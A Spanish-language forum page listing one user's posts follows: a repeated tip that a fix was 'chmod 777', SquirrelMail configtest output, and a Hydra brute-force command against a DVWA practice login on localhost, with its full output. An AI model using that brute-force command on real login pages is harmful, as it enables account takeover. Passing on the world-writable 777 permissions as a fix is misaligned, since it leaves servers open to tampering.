ya lo solucione me ayudo un we lordblacksuca
nomas se le dan permisos chmod 777
pal que quiera solucionar como yo xD
nomas se le dan permisos chmod 777
pal que quiera solucionar como yo xD
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúSquirrelMail configtest
This script will try to check some aspects of your SquirrelMail configuration and point you to errors whereever it can find them. You need to go run conf.pl in the config/ directory first before you run this script.
SquirrelMail version: 1.4.22
Config file version: 1.4.0
Config file last modified: 05 September 2012 04:04:28
Checking PHP configuration...
PHP version 5.3.8 OK.
Running as nobody(65534) / nogroup(65534)
display_errors: 1
error_reporting: 32767
variables_order OK: GPCS.
PHP extensions OK. Dynamic loading is disabled.
Checking paths...
ERROR: I cannot write to data dir (/var/lib/squirrelmail/data/)!
hydra -vV -L lista.txt -P lista.txt -f -o found 127.0.0.1 http-get-form "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect"
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-13 02:30:54
[DATA] 16 tasks, 1 server, 49 login tries (l:7/p:7), ~3 tries per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 49 [child 0]
[80][www-form] host: 127.0.0.1 login: admin password: user
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "user" - 2 of 49 [child 1]
[80][www-form] host: 127.0.0.1 login: admin password: admin
[80][www-form] host: 127.0.0.1 login: admin password: xd
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd" - 3 of 49 [child 2]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 4 of 49 [child 3]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "chulo" - 5 of 49 [child 4]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "preciosa" - 6 of 49 [child 5]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd5" - 7 of 49 [child 6]
[80][www-form] host: 127.0.0.1 login: admin password: password
[ATTEMPT] target 127.0.0.1 - login "user" - pass "admin" - 8 of 49 [child 7]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "user" - 9 of 49 [child 8]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd" - 10 of 49 [child 9]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "password" - 11 of 49 [child 10]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "chulo" - 12 of 49 [child 11]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "preciosa" - 13 of 49 [child 12]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd5" - 14 of 49 [child 13]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "admin" - 15 of 49 [child 14]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "user" - 16 of 49 [child 15]
[80][www-form] host: 127.0.0.1 login: admin password: preciosa
[80][www-form] host: 127.0.0.1 login: admin password: xd5
[80][www-form] host: 127.0.0.1 login: user password: xd
[80][www-form] host: 127.0.0.1 login: user password: admin
[80][www-form] host: 127.0.0.1 login: user password: user
[80][www-form] host: 127.0.0.1 login: user password: chulo
[80][www-form] host: 127.0.0.1 login: user password: password
[80][www-form] host: 127.0.0.1 login: xd password: admin
[80][www-form] host: 127.0.0.1 login: user password: preciosa
[80][www-form] host: 127.0.0.1 login: user password: xd5
[80][www-form] host: 127.0.0.1 login: xd password: user
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-13 02:30:54